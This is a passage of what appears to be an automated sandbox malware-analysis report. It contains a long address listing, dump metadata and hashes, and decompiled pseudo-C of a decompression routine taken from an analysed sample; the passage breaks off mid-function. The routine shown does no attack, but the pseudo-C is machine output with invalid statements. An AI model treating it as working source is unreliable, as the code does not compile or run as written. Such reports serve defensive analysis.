                                              0x0040685a
                                              0x0040685e
                                              0x00406b85
                                              0x00000000
                                              0x00406b85
                                              0x00406864
                                              0x00406867
                                              0x0040686a
                                              0x0040686e
                                              0x00406871
                                              0x00406877
                                              0x00406879
                                              0x00406879
                                              0x00406879
                                              0x0040687c
                                              0x00000000
                                              0x00000000
                                              0x0040662a
                                              0x0040662a
                                              0x0040662d
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406a26
                                              0x00406a2a
                                              0x00406a48
                                              0x00406a48
                                              0x00406a48
                                              0x00406a4f
                                              0x00406a56
                                              0x00000000
                                              0x00406a56
                                              0x00406a2c
                                              0x00406a2f
                                              0x00406a32
                                              0x00406a35
                                              0x00406a3c
                                              0x00000000
                                              0x00000000
                                              0x00406b17
                                              0x00406b1a
                                              0x00406a1b
                                              0x00406a1b
                                              0x00000000
                                              0x00000000
                                              0x00406751
                                              0x00406753
                                              0x0040675a
                                              0x0040675b
                                              0x0040675d
                                              0x00406760
                                              0x00000000
                                              0x00000000
                                              0x00406768
                                              0x0040676b
                                              0x0040676e
                                              0x00406770
                                              0x00406772
                                              0x00406772
                                              0x00406773
                                              0x00406776
                                              0x0040677d
                                              0x00406780
                                              0x0040678e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406a73
                                              0x00406a73
                                              0x00406a77
                                              0x00406baf
                                              0x00000000
                                              0x00406baf
                                              0x00406a7d
                                              0x00406a80
                                              0x00406a83
                                              0x00406a87
                                              0x00406a8a
                                              0x00406a90
                                              0x00406a92
                                              0x00406a92
                                              0x00406a92
                                              0x00406a95
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00000000
                                              0x00000000
                                              0x00406796
                                              0x00406799
                                              0x004067cf
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x00406902
                                              0x00406902
                                              0x00406905
                                              0x00406907
                                              0x00406b91
                                              0x00000000
                                              0x00406b91
                                              0x0040690d
                                              0x00406910
                                              0x00000000
                                              0x00000000
                                              0x00406916
                                              0x0040691a
                                              0x0040691d
                                              0x0040691d
                                              0x0040691d
                                              0x00000000
                                              0x0040691d
                                              0x0040679b
                                              0x0040679d
                                              0x0040679f
                                              0x004067a1
                                              0x004067a4
                                              0x004067a5
                                              0x004067a7
                                              0x004067a9
                                              0x004067ac
                                              0x004067af
                                              0x004067c5
                                              0x004067ca
                                              0x00406802
                                              0x00406802
                                              0x00406806
                                              0x00406832
                                              0x00406834
                                              0x0040683b
                                              0x0040683e
                                              0x00406841
                                              0x00406841
                                              0x00406846
                                              0x00406846
                                              0x00406848
                                              0x0040684b
                                              0x00406852
                                              0x00406855
                                              0x00406882
                                              0x00406882
                                              0x00406885
                                              0x00406888
                                              0x004068fc
                                              0x004068fc
                                              0x004068fc
                                              0x00000000
                                              0x004068fc
                                              0x0040688a
                                              0x00406890
                                              0x00406893
                                              0x00406896
                                              0x00406899
                                              0x0040689c
                                              0x0040689f
                                              0x004068a2
                                              0x004068a5
                                              0x004068a8
                                              0x004068ab
                                              0x004068c4
                                              0x004068c6
                                              0x004068c9
                                              0x004068ca
                                              0x004068cd
                                              0x004068cf
                                              0x004068d2
                                              0x004068d4
                                              0x004068d6
                                              0x004068d9
                                              0x004068db
                                              0x004068de
                                              0x004068e2
                                              0x004068e4
                                              0x004068e4
                                              0x004068e5
                                              0x004068e8
                                              0x004068eb
                                              0x004068ad
                                              0x004068ad
                                              0x004068b5
                                              0x004068ba
                                              0x004068bc
                                              0x004068bf
                                              0x004068bf
                                              0x004068ee
                                              0x004068f5
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x00000000
                                              0x004068f7
                                              0x00000000
                                              0x004068f7
                                              0x004068f5
                                              0x00406808
                                              0x0040680b
                                              0x0040680d
                                              0x00406810
                                              0x00406813
                                              0x00406816
                                              0x00406818
                                              0x0040681b
                                              0x0040681e
                                              0x0040681e
                                              0x00406821
                                              0x00406821
                                              0x00406824
                                              0x0040682b
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x00000000
                                              0x0040682d
                                              0x00000000
                                              0x0040682d
                                              0x0040682b
                                              0x004067b1
                                              0x004067b4
                                              0x004067b6
                                              0x004067b9
                                              0x00000000
                                              0x00000000
                                              0x00406518
                                              0x00406518
                                              0x0040651c
                                              0x00406b61
                                              0x00000000
                                              0x00406b61
                                              0x00406522
                                              0x00406525
                                              0x00406528
                                              0x0040652b
                                              0x0040652e
                                              0x00406531
                                              0x00406534
                                              0x00406536
                                              0x00406539
                                              0x0040653c
                                              0x0040653f
                                              0x00406541
                                              0x00406541
                                              0x00406541
                                              0x00000000
                                              0x00000000
                                              0x004066a3
                                              0x004066a3
                                              0x004066a7
                                              0x00406b6d
                                              0x00000000
                                              0x00406b6d
                                              0x004066ad
                                              0x004066b0
                                              0x004066b3
                                              0x004066b6
                                              0x004066b8
                                              0x004066b8
                                              0x004066b8
                                              0x004066bb
                                              0x004066be
                                              0x004066c1
                                              0x004066c4
                                              0x004066c7
                                              0x004066ca
                                              0x004066cb
                                              0x004066cd
                                              0x004066cd
                                              0x004066cd
                                              0x004066d0
                                              0x004066d3
                                              0x004066d6
                                              0x004066d9
                                              0x004066d9
                                              0x004066d9
                                              0x004066dc
                                              0x004066de
                                              0x004066de
                                              0x00000000
                                              0x00000000
                                              0x00406920
                                              0x00406920
                                              0x00406920
                                              0x00406924
                                              0x00000000
                                              0x00000000
                                              0x0040692a
                                              0x0040692d
                                              0x00406930
                                              0x00406933
                                              0x00406935
                                              0x00406935
                                              0x00406935
                                              0x00406938
                                              0x0040693b
                                              0x0040693e
                                              0x00406941
                                              0x00406944
                                              0x00406947
                                              0x00406948
                                              0x0040694a
                                              0x0040694a
                                              0x0040694a
                                              0x0040694d
                                              0x00406950
                                              0x00406953
                                              0x00406956
                                              0x00406959
                                              0x0040695d
                                              0x0040695f
                                              0x00406962
                                              0x00000000
                                              0x00406964
                                              0x004066e1
                                              0x004066e1
                                              0x00000000
                                              0x004066e1
                                              0x00406962
                                              0x00406b97
                                              0x00406bb9
                                              0x00406bbf
                                              0x00406bc1
                                              0x00406bc8
                                              0x00406bca
                                              0x00406bd1
                                              0x00406bd5
                                              0x00000000
                                              0x004061c6
                                              0x00406bce
                                              0x00406bce
                                              0x00000000
                                              0x00406bce
                                              0x00406a1b
                                              0x00406aa1
                                              0x00406aa7
                                              0x00406aaa
                                              0x00406aad
                                              0x00406ab0
                                              0x00406ab3
                                              0x00406ab6
                                              0x00406ab9
                                              0x00406abc
                                              0x00406ac2
                                              0x00406adb
                                              0x00406ade
                                              0x00406ae1
                                              0x00406ae4
                                              0x00406ae8
                                              0x00406aea
                                              0x00406aeb
                                              0x00406aee
                                              0x00406ac4
                                              0x00406ac4
                                              0x00406acc
                                              0x00406ad1
                                              0x00406ad3
                                              0x00406ad6
                                              0x00406ad6
                                              0x00406af8
                                              0x00000000
                                              0x00406afa
                                              0x00000000
                                              0x00406afa
                                              0x00406af8
                                              0x00000000
                                              0x0040696d

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
                                              • Instruction ID: f8b3e10e58f717f8edde5794a38fefd32bea2d44dd320be9cbeb21c60fb05cda
                                              • Opcode Fuzzy Hash: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
                                              • Instruction Fuzzy Hash: F5913270E00229CBDF28DF98C8547ADBBB1FB45305F15816ED816BB281C778AA96DF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040667F Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E0040667F() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406BD6))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
